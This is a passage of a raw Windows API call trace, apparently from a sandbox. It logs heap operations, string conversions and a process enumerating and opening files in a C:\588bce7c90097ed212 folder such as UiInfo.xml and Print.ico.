HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0061.938] AreFileApisANSI () returned 1 [0061.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0061.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67660 [0061.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=42 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 42 [0061.938] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a)) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.938] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x52, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x71968, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x52, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="xm", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓颊")) returned 0 [0061.938] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0061.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.939] AreFileApisANSI () returned 1 [0061.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics", lpUsedDefaultChar=0x0) returned 31 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0061.940] AreFileApisANSI () returned 1 [0061.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0061.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53640 [0061.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=31 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics") returned 31 [0061.940] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics" (normalized: "c:\\588bce7c90097ed212\\graphics"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.940] GetLastError () returned 0x5 [0061.940] GetLastError () returned 0x5 [0061.940] SetLastError (dwErrCode=0x5) [0061.940] GetLastError () returned 0x5 [0061.940] SetLastError (dwErrCode=0x5) [0061.940] GetLastError () returned 0x5 [0061.940] SetLastError (dwErrCode=0x5) [0061.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.940] AreFileApisANSI () returned 1 [0061.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0061.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53718 [0061.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=31 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics") returned 31 [0061.940] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics" (normalized: "c:\\588bce7c90097ed212\\graphics"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.941] GetLastError () returned 0x5 [0061.941] GetLastError () returned 0x5 [0061.941] SetLastError (dwErrCode=0x5) [0061.941] GetLastError () returned 0x5 [0061.941] SetLastError (dwErrCode=0x5) [0061.941] GetLastError () returned 0x5 [0061.941] SetLastError (dwErrCode=0x5) [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.941] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.941] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="header.bmp", cAlternateFileName="")) returned 1 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0061.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0061.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.942] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x780d0 [0062.009] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.009] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0062.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0062.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.010] AreFileApisANSI () returned 1 [0062.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico", lpUsedDefaultChar=0x0) returned 41 [0062.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0062.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.010] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0062.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0062.010] AreFileApisANSI () returned 1 [0062.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0062.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0062.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0062.010] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.011] GetFileType (hFile=0x41c) returned 0x1 [0062.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.011] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.011] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.011] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.011] CloseHandle (hObject=0x41c) returned 1 [0062.012] AreFileApisANSI () returned 1 [0062.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0062.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0062.012] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.012] GetFileType (hFile=0x41c) returned 0x1 [0062.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.012] CloseHandle (hObject=0x41c) returned 1 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0062.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.013] AreFileApisANSI () returned 1 [0062.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0062.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 